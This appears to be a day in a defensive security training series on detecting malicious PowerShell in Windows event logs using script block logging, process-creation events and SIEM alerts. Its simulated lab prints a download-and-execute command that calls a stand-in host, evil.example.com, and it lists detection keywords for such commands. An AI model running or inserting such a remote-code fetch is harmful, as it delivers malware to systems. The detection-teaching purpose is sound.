Day 20 – Detecting Malicious PowerShell in Windows Logs

Objective: Identify and investigate suspicious PowerShell activity in Windows event logs. Challenge Description: Imagine the phishing email’s attachment was a Windows Office document that executed a hidden PowerShell payload (via macros). You need to find traces of this in Windows logs. The focus is on PowerShell logging – e.g. the script content and commands run – to catch malicious scripts. Tools: Windows Event Viewer or exported .evtx logs. Ensure PowerShell logging is enabled (Module Logging, Script Block Logging). If Sysmon is installed, check its logs (Event ID 4688 for process creation). Otherwise, use the Windows PowerShell logs (Applications and Services Logs → Windows PowerShell). Steps to Solve: 1. Enable/Check PowerShell logging: Ensure script block logging is on (Events 4103, 4104). Look in the Windows PowerShell event log for Event ID 4104, which contains the full PowerShell script text[19]. 2. Search for known patterns: In the logs, search for suspicious keywords (like Invoke-Expression, IEX, or domains/IPs seen as IOCs). You may find encoded or obfuscated commands in the script block events[20]. 3. Check process creation: Look at Security logs (4688) or Sysmon Event ID 1 for a powershell.exe invocation with unusual command-line arguments (e.g. -WindowStyle Hidden, -EncodedCommand). 4. Extract the script: If you find an Event 4104 entry, copy the script contents. Decode any Base64 blocks to see the real commands. This reveals the attacker’s actions (downloading malware, spawning shells, etc.). 5. Log IOCs: Record any malicious domains, IPs, file paths, or suspicious PowerShell command strings. 6. Respond: Block any malicious URLs/IPs, create detection rules for the discovered commands, and uninstall the malicious script from endpoints.

Simulated Lab: Event Viewer shows several Windows PowerShell events around the attack time. An Event ID 4104 entry contains:

IEX (New-Object Net.WebClient).DownloadString('http://evil.example.com/payload.ps1')

This raw command appeared because Script Block Logging was enabled[19]. You also find Event ID 4103 (module logging) showing the Invoke-Expression usage. The script tried to download from evil.example.com (IOC) and execute it.

Separately, the Security log has an event 4688:

A new process has been created: Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Command Line: powershell.exe -NoProfile -EncodedCommand SQBuAG...

Decoding the Base64 reveals another obfuscated payload download. You note both URL and the full decoded script (saving them as evidence).

To ensure future detection, you enable PowerShell logging on all endpoints and add a SIEM alert for any script containing DownloadString or suspicious base64 in 4104 logs[20][19]. The malicious PowerShell artifacts (script text, domains, downloaded file hash) are added to the IOC list.

Key Citations: PowerShell Script Block Logging (Event ID 4104) provides raw, deobfuscated script content, giving defenders visibility into the commands executed[19]. Analysts should export and query these logs (4104) for suspicious strings (even base64-encoded commands)[20][19].